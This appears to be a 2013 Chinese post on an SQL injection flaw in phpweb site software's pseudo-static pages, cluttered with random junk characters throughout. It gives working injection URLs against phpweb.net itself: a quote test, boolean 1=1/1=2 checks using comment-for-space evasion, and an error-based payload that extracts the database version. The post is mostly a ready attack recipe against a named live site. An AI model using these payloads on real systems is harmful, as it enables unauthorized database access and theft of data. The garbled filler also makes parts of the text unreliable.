phpweb所有的整站程序伪静态页面都存在sql注入
8 R' i& ^* v j% b- {$ N( a4 Q0 D
: L0 r( g$ y9 v) q9 g- G1 _0 r8 B主站:http://phpweb.net/" c; R8 U* f6 [' e' C8 m1 D
加’检测:% w( T* h% n1 f! }3 n+ J* k' d
- B$ ^: ~2 T9 a- |; I3 B2 a& B6 q
http://www.phpweb.net/down/html/?772′.html P% N) O M7 F4 H% Q
6 k5 q+ B* T) D5 k, B* w/ _" M% y
出错" e- k8 C. `$ y3 x
存在注入。8 G `- I; {4 _" w8 H( d
不能用空格,只能用/*罗) U, i: c' \4 U" [/ b$ h7 N
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常8 V3 R; E( m8 @" P* S
+ k5 p4 k% q* `8 u. b7 Phttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.+ H8 x' A3 Y- U H0 R
爆数据库版本:
: N; o1 N& Q! d K. V S; w% A- V5 r
?4 m4 w: Q6 a. a( n/ q, w
1
# a/ y4 h$ z7 W! C2 xhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html% b( W! F5 z( _- Y+ o" Z3 I
更新日期: 2013-01-03 13:39:50
% f3 i/ \7 _+ x2 p- w, L" Q2 C |